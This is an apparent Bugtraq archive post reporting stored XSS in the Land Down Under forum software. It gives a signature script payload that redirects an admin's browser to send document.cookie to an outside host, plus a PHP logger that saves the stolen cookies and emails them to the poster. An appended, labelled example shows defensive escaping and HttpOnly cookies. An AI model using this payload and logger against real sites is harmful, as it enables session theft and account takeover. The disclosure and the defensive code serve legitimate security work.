Bugtraq mailing list archives

Land Down Under
From: bendeniz_avci () hotmail com
Date: 28 Aug 2005 07:55:34 -0000

Bug finder: spyMASter
Web site: Realhackers.net
Contact: bendeniz_avci () hotmail com

LDU has some XSS vulns.
Firstly, you can use HTML code in your signature; you can get cookies with this.
Put this code in your signature:

<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT>

and post a topic to the forum. When the admin looks at this topic, she/he is redirected and you can get the cookie.

This is the code of ekle.php; you can save the cookie to a  with this PHP code:


<?php
$kayit = fopen("spymaster.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("bendeniz_avci () hotmail com","your cookie ready","http://www.realhackers.net/spyoku.txt";,'From: spymaster () 
realhackers net');
?>
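
The following is an added example, not part of the original post and not LDU's own code: one way a forum could render signatures so that the raw HTML described above never reaches the page, with an HttpOnly session cookie as a second layer. The function names `render_signature()` and `harden_session_cookie()` and the sample signatures are assumptions made for illustration; the array form of `session_set_cookie_params()` assumes PHP 7.3 or later.

```php
<?php
// Added example (not LDU code). Function names and sample inputs are
// hypothetical / constructed for illustration.

// Render a user signature: escape everything first, then re-introduce a
// small BBCode subset as fixed tags, so no user-supplied markup survives.
function render_signature(string $raw): string
{
    $safe = htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // Links: only http/https targets, no whitespace or ']' in the URL.
    // Quotes are already escaped, so the value cannot leave the attribute.
    // Anything else (javascript:, data:, ...) stays as inert escaped text.
    $safe = preg_replace(
        '#\[url=(https?://[^\]\s]+)\](.*?)\[/url\]#is',
        '<a href="$1" rel="nofollow noopener">$2</a>',
        $safe
    );

    // Bold and italic map to fixed tags without attributes.
    $safe = preg_replace('#\[b\](.*?)\[/b\]#is', '<strong>$1</strong>', $safe);
    $safe = preg_replace('#\[i\](.*?)\[/i\]#is', '<em>$1</em>', $safe);

    return nl2br($safe);
}

// Second layer: with HttpOnly set, script running in the page cannot read
// the session cookie through document.cookie. Call before session_start().
function harden_session_cookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // assumes the forum is served over HTTPS
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Constructed sample signatures: one benign, two hostile.
$samples = [
    "[b]member[/b]\n[url=https://example.org/]home page[/url]",
    "<SCRIPT>alert(document.cookie)</SCRIPT>",
    "[url=javascript:alert(1)]click[/url]",
];
foreach ($samples as $signature) {
    echo render_signature($signature), "\n---\n";
}
```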

